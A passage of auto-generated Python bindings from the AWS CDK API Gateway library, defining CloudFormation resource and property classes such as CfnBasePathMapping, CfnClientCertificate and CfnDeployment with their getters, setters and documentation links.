"""``AWS::ApiGatewayV2::Authorizer.AuthorizerResultTtlInSeconds``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-authorizerresultttlinseconds
"""
return self._values.get('authorizer_result_ttl_in_seconds')
@property
def identity_validation_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Authorizer.IdentityValidationExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-identityvalidationexpression
"""
return self._values.get('identity_validation_expression')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnAuthorizerV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnBasePathMapping(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnBasePathMapping"):
"""A CloudFormation ``AWS::ApiGateway::BasePathMapping``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-basepathmapping.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::BasePathMapping
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, domain_name: str, base_path: typing.Optional[str]=None, rest_api_id: typing.Optional[str]=None, stage: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGateway::BasePathMapping``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param domain_name: ``AWS::ApiGateway::BasePathMapping.DomainName``.
:param base_path: ``AWS::ApiGateway::BasePathMapping.BasePath``.
:param rest_api_id: ``AWS::ApiGateway::BasePathMapping.RestApiId``.
:param stage: ``AWS::ApiGateway::BasePathMapping.Stage``.
"""
props = CfnBasePathMappingProps(domain_name=domain_name, base_path=base_path, rest_api_id=rest_api_id, stage=stage)
jsii.create(CfnBasePathMapping, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="domainName")
def domain_name(self) -> str:
"""``AWS::ApiGateway::BasePathMapping.DomainName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-basepathmapping.html#cfn-apigateway-basepathmapping-domainname
"""
return jsii.get(self, "domainName")
@domain_name.setter
def domain_name(self, value: str):
return jsii.set(self, "domainName", value)
@property
@jsii.member(jsii_name="basePath")
def base_path(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::BasePathMapping.BasePath``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-basepathmapping.html#cfn-apigateway-basepathmapping-basepath
"""
return jsii.get(self, "basePath")
@base_path.setter
def base_path(self, value: typing.Optional[str]):
return jsii.set(self, "basePath", value)
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::BasePathMapping.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-basepathmapping.html#cfn-apigateway-basepathmapping-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: typing.Optional[str]):
return jsii.set(self, "restApiId", value)
@property
@jsii.member(jsii_name="stage")
def stage(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::BasePathMapping.Stage``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-basepathmapping.html#cfn-apigateway-basepathmapping-stage
"""
return jsii.get(self, "stage")
@stage.setter
def stage(self, value: typing.Optional[str]):
return jsii.set(self, "stage", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnBasePathMappingProps", jsii_struct_bases=[], name_mapping={'domain_name': 'domainName', 'base_path': 'basePath', 'rest_api_id': 'restApiId', 'stage': 'stage'})
class CfnBasePathMappingProps():
def __init__(self, *, domain_name: str, base_path: typing.Optional[str]=None, rest_api_id: typing.Optional[str]=None, stage: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGateway::BasePathMapping``.
:param domain_name: ``AWS::ApiGateway::BasePathMapping.DomainName``.
:param base_path: ``AWS::ApiGateway::BasePathMapping.BasePath``.
:param rest_api_id: ``AWS::ApiGateway::BasePathMapping.RestApiId``.
:param stage: ``AWS::ApiGateway::BasePathMapping.Stage``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-basepathmapping.html
"""
self._values = {
'domain_name': domain_name,
}
if base_path is not None: self._values["base_path"] = base_path
if rest_api_id is not None: self._values["rest_api_id"] = rest_api_id
if stage is not None: self._values["stage"] = stage
@property
def domain_name(self) -> str:
"""``AWS::ApiGateway::BasePathMapping.DomainName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-basepathmapping.html#cfn-apigateway-basepathmapping-domainname
"""
return self._values.get('domain_name')
@property
def base_path(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::BasePathMapping.BasePath``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-basepathmapping.html#cfn-apigateway-basepathmapping-basepath
"""
return self._values.get('base_path')
@property
def rest_api_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::BasePathMapping.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-basepathmapping.html#cfn-apigateway-basepathmapping-restapiid
"""
return self._values.get('rest_api_id')
@property
def stage(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::BasePathMapping.Stage``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-basepathmapping.html#cfn-apigateway-basepathmapping-stage
"""
return self._values.get('stage')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnBasePathMappingProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnClientCertificate(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnClientCertificate"):
"""A CloudFormation ``AWS::ApiGateway::ClientCertificate``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-clientcertificate.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::ClientCertificate
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, description: typing.Optional[str]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None) -> None:
"""Create a new ``AWS::ApiGateway::ClientCertificate``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param description: ``AWS::ApiGateway::ClientCertificate.Description``.
:param tags: ``AWS::ApiGateway::ClientCertificate.Tags``.
"""
props = CfnClientCertificateProps(description=description, tags=tags)
jsii.create(CfnClientCertificate, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
"""``AWS::ApiGateway::ClientCertificate.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-clientcertificate.html#cfn-apigateway-clientcertificate-tags
"""
return jsii.get(self, "tags")
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::ClientCertificate.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-clientcertificate.html#cfn-apigateway-clientcertificate-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnClientCertificateProps", jsii_struct_bases=[], name_mapping={'description': 'description', 'tags': 'tags'})
class CfnClientCertificateProps():
def __init__(self, *, description: typing.Optional[str]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None):
"""Properties for defining a ``AWS::ApiGateway::ClientCertificate``.
:param description: ``AWS::ApiGateway::ClientCertificate.Description``.
:param tags: ``AWS::ApiGateway::ClientCertificate.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-clientcertificate.html
"""
self._values = {
}
if description is not None: self._values["description"] = description
if tags is not None: self._values["tags"] = tags
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::ClientCertificate.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-clientcertificate.html#cfn-apigateway-clientcertificate-description
"""
return self._values.get('description')
@property
def tags(self) -> typing.Optional[typing.List[aws_cdk.core.CfnTag]]:
"""``AWS::ApiGateway::ClientCertificate.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-clientcertificate.html#cfn-apigateway-clientcertificate-tags
"""
return self._values.get('tags')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnClientCertificateProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnDeployment(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnDeployment"):
"""A CloudFormation ``AWS::ApiGateway::Deployment``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::Deployment
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, rest_api_id: str, deployment_canary_settings: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["DeploymentCanarySettingsProperty"]]]=None, description: typing.Optional[str]=None, stage_description: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["StageDescriptionProperty"]]]=None, stage_name: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGateway::Deployment``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param rest_api_id: ``AWS::ApiGateway::Deployment.RestApiId``.
:param deployment_canary_settings: ``AWS::ApiGateway::Deployment.DeploymentCanarySettings``.
:param description: ``AWS::ApiGateway::Deployment.Description``.
:param stage_description: ``AWS::ApiGateway::Deployment.StageDescription``.
:param stage_name: ``AWS::ApiGateway::Deployment.StageName``.
"""
props = CfnDeploymentProps(rest_api_id=rest_api_id, deployment_canary_settings=deployment_canary_settings, description=description, stage_description=stage_description, stage_name=stage_name)
jsii.create(CfnDeployment, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Deployment.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html#cfn-apigateway-deployment-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: str):
return jsii.set(self, "restApiId", value)
@property
@jsii.member(jsii_name="deploymentCanarySettings")
def deployment_canary_settings(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["DeploymentCanarySettingsProperty"]]]:
"""``AWS::ApiGateway::Deployment.DeploymentCanarySettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html#cfn-apigateway-deployment-deploymentcanarysettings
"""
return jsii.get(self, "deploymentCanarySettings")
@deployment_canary_settings.setter
def deployment_canary_settings(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["DeploymentCanarySettingsProperty"]]]):
return jsii.set(self, "deploymentCanarySettings", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Deployment.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html#cfn-apigateway-deployment-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@property
@jsii.member(jsii_name="stageDescription")
def stage_description(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["StageDescriptionProperty"]]]:
"""``AWS::ApiGateway::Deployment.StageDescription``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html#cfn-apigateway-deployment-stagedescription
"""
return jsii.get(self, "stageDescription")
@stage_description.setter
def stage_description(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["StageDescriptionProperty"]]]):
return jsii.set(self, "stageDescription", value)
@property
@jsii.member(jsii_name="stageName")
def stage_name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Deployment.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html#cfn-apigateway-deployment-stagename
"""
return jsii.get(self, "stageName")
@stage_name.setter
def stage_name(self, value: typing.Optional[str]):
return jsii.set(self, "stageName", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDeployment.AccessLogSettingProperty", jsii_struct_bases=[], name_mapping={'destination_arn': 'destinationArn', 'format': 'format'})
class AccessLogSettingProperty():
def __init__(self, *, destination_arn: typing.Optional[str]=None, format: typing.Optional[str]=None):
"""
:param destination_arn: ``CfnDeployment.AccessLogSettingProperty.DestinationArn``.
:param format: ``CfnDeployment.AccessLogSettingProperty.Format``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-accesslogsetting.html
"""
self._values = {
}
if destination_arn is not None: self._values["destination_arn"] = destination_arn
if format is not None: self._values["format"] = format
@property
def destination_arn(self) -> typing.Optional[str]:
"""``CfnDeployment.AccessLogSettingProperty.DestinationArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-accesslogsetting.html#cfn-apigateway-deployment-accesslogsetting-destinationarn
"""
return self._values.get('destination_arn')
@property
def format(self) -> typing.Optional[str]:
"""``CfnDeployment.AccessLogSettingProperty.Format``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-accesslogsetting.html#cfn-apigateway-deployment-accesslogsetting-format
"""
return self._values.get('format')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'AccessLogSettingProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDeployment.CanarySettingProperty", jsii_struct_bases=[], name_mapping={'percent_traffic': 'percentTraffic', 'stage_variable_overrides': 'stageVariableOverrides', 'use_stage_cache': 'useStageCache'})
class CanarySettingProperty():
def __init__(self, *, percent_traffic: typing.Optional[jsii.Number]=None, stage_variable_overrides: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, use_stage_cache: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None):
"""
:param percent_traffic: ``CfnDeployment.CanarySettingProperty.PercentTraffic``.
:param stage_variable_overrides: ``CfnDeployment.CanarySettingProperty.StageVariableOverrides``.
:param use_stage_cache: ``CfnDeployment.CanarySettingProperty.UseStageCache``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-canarysetting.html
"""
self._values = {
}
if percent_traffic is not None: self._values["percent_traffic"] = percent_traffic
if stage_variable_overrides is not None: self._values["stage_variable_overrides"] = stage_variable_overrides
if use_stage_cache is not None: self._values["use_stage_cache"] = use_stage_cache
@property
def percent_traffic(self) -> typing.Optional[jsii.Number]:
"""``CfnDeployment.CanarySettingProperty.PercentTraffic``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-canarysetting.html#cfn-apigateway-deployment-canarysetting-percenttraffic
"""
return self._values.get('percent_traffic')
@property
def stage_variable_overrides(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``CfnDeployment.CanarySettingProperty.StageVariableOverrides``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-canarysetting.html#cfn-apigateway-deployment-canarysetting-stagevariableoverrides
"""
return self._values.get('stage_variable_overrides')
@property
def use_stage_cache(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.CanarySettingProperty.UseStageCache``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-canarysetting.html#cfn-apigateway-deployment-canarysetting-usestagecache
"""
return self._values.get('use_stage_cache')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CanarySettingProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDeployment.DeploymentCanarySettingsProperty", jsii_struct_bases=[], name_mapping={'percent_traffic': 'percentTraffic', 'stage_variable_overrides': 'stageVariableOverrides', 'use_stage_cache': 'useStageCache'})
class DeploymentCanarySettingsProperty():
def __init__(self, *, percent_traffic: typing.Optional[jsii.Number]=None, stage_variable_overrides: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, use_stage_cache: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None):
"""
:param percent_traffic: ``CfnDeployment.DeploymentCanarySettingsProperty.PercentTraffic``.
:param stage_variable_overrides: ``CfnDeployment.DeploymentCanarySettingsProperty.StageVariableOverrides``.
:param use_stage_cache: ``CfnDeployment.DeploymentCanarySettingsProperty.UseStageCache``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-deploymentcanarysettings.html
"""
self._values = {
}
if percent_traffic is not None: self._values["percent_traffic"] = percent_traffic
if stage_variable_overrides is not None: self._values["stage_variable_overrides"] = stage_variable_overrides
if use_stage_cache is not None: self._values["use_stage_cache"] = use_stage_cache
@property
def percent_traffic(self) -> typing.Optional[jsii.Number]:
"""``CfnDeployment.DeploymentCanarySettingsProperty.PercentTraffic``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-deploymentcanarysettings.html#cfn-apigateway-deployment-deploymentcanarysettings-percenttraffic
"""
return self._values.get('percent_traffic')
@property
def stage_variable_overrides(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``CfnDeployment.DeploymentCanarySettingsProperty.StageVariableOverrides``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-deploymentcanarysettings.html#cfn-apigateway-deployment-deploymentcanarysettings-stagevariableoverrides
"""
return self._values.get('stage_variable_overrides')
@property
def use_stage_cache(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.DeploymentCanarySettingsProperty.UseStageCache``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-deploymentcanarysettings.html#cfn-apigateway-deployment-deploymentcanarysettings-usestagecache
"""
return self._values.get('use_stage_cache')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'DeploymentCanarySettingsProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDeployment.MethodSettingProperty", jsii_struct_bases=[], name_mapping={'cache_data_encrypted': 'cacheDataEncrypted', 'cache_ttl_in_seconds': 'cacheTtlInSeconds', 'caching_enabled': 'cachingEnabled', 'data_trace_enabled': 'dataTraceEnabled', 'http_method': 'httpMethod', 'logging_level': 'loggingLevel', 'metrics_enabled': 'metricsEnabled', 'resource_path': 'resourcePath', 'throttling_burst_limit': 'throttlingBurstLimit', 'throttling_rate_limit': 'throttlingRateLimit'})
class MethodSettingProperty():
def __init__(self, *, cache_data_encrypted: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, cache_ttl_in_seconds: typing.Optional[jsii.Number]=None, caching_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, data_trace_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, http_method: typing.Optional[str]=None, logging_level: typing.Optional[str]=None, metrics_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, resource_path: typing.Optional[str]=None, throttling_burst_limit: typing.Optional[jsii.Number]=None, throttling_rate_limit: typing.Optional[jsii.Number]=None):
"""
:param cache_data_encrypted: ``CfnDeployment.MethodSettingProperty.CacheDataEncrypted``.
:param cache_ttl_in_seconds: ``CfnDeployment.MethodSettingProperty.CacheTtlInSeconds``.
:param caching_enabled: ``CfnDeployment.MethodSettingProperty.CachingEnabled``.
:param data_trace_enabled: ``CfnDeployment.MethodSettingProperty.DataTraceEnabled``.
:param http_method: ``CfnDeployment.MethodSettingProperty.HttpMethod``.
:param logging_level: ``CfnDeployment.MethodSettingProperty.LoggingLevel``.
:param metrics_enabled: ``CfnDeployment.MethodSettingProperty.MetricsEnabled``.
:param resource_path: ``CfnDeployment.MethodSettingProperty.ResourcePath``.
:param throttling_burst_limit: ``CfnDeployment.MethodSettingProperty.ThrottlingBurstLimit``.
:param throttling_rate_limit: ``CfnDeployment.MethodSettingProperty.ThrottlingRateLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html
"""
self._values = {
}
if cache_data_encrypted is not None: self._values["cache_data_encrypted"] = cache_data_encrypted
if cache_ttl_in_seconds is not None: self._values["cache_ttl_in_seconds"] = cache_ttl_in_seconds
if caching_enabled is not None: self._values["caching_enabled"] = caching_enabled
if data_trace_enabled is not None: self._values["data_trace_enabled"] = data_trace_enabled
if http_method is not None: self._values["http_method"] = http_method
if logging_level is not None: self._values["logging_level"] = logging_level
if metrics_enabled is not None: self._values["metrics_enabled"] = metrics_enabled
if resource_path is not None: self._values["resource_path"] = resource_path
if throttling_burst_limit is not None: self._values["throttling_burst_limit"] = throttling_burst_limit
if throttling_rate_limit is not None: self._values["throttling_rate_limit"] = throttling_rate_limit
@property
def cache_data_encrypted(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.MethodSettingProperty.CacheDataEncrypted``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html#cfn-apigateway-deployment-stagedescription-methodsetting-cachedataencrypted
"""
return self._values.get('cache_data_encrypted')
@property
def cache_ttl_in_seconds(self) -> typing.Optional[jsii.Number]:
"""``CfnDeployment.MethodSettingProperty.CacheTtlInSeconds``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html#cfn-apigateway-deployment-stagedescription-methodsetting-cachettlinseconds
"""
return self._values.get('cache_ttl_in_seconds')
@property
def caching_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.MethodSettingProperty.CachingEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html#cfn-apigateway-deployment-stagedescription-methodsetting-cachingenabled
"""
return self._values.get('caching_enabled')
@property
def data_trace_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.MethodSettingProperty.DataTraceEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html#cfn-apigateway-deployment-stagedescription-methodsetting-datatraceenabled
"""
return self._values.get('data_trace_enabled')
@property
def http_method(self) -> typing.Optional[str]:
"""``CfnDeployment.MethodSettingProperty.HttpMethod``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html#cfn-apigateway-deployment-stagedescription-methodsetting-httpmethod
"""
return self._values.get('http_method')
@property
def logging_level(self) -> typing.Optional[str]:
"""``CfnDeployment.MethodSettingProperty.LoggingLevel``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html#cfn-apigateway-deployment-stagedescription-methodsetting-logginglevel
"""
return self._values.get('logging_level')
@property
def metrics_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.MethodSettingProperty.MetricsEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html#cfn-apigateway-deployment-stagedescription-methodsetting-metricsenabled
"""
return self._values.get('metrics_enabled')
@property
def resource_path(self) -> typing.Optional[str]:
"""``CfnDeployment.MethodSettingProperty.ResourcePath``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html#cfn-apigateway-deployment-stagedescription-methodsetting-resourcepath
"""
return self._values.get('resource_path')
@property
def throttling_burst_limit(self) -> typing.Optional[jsii.Number]:
"""``CfnDeployment.MethodSettingProperty.ThrottlingBurstLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html#cfn-apigateway-deployment-stagedescription-methodsetting-throttlingburstlimit
"""
return self._values.get('throttling_burst_limit')
@property
def throttling_rate_limit(self) -> typing.Optional[jsii.Number]:
"""``CfnDeployment.MethodSettingProperty.ThrottlingRateLimit``.
see
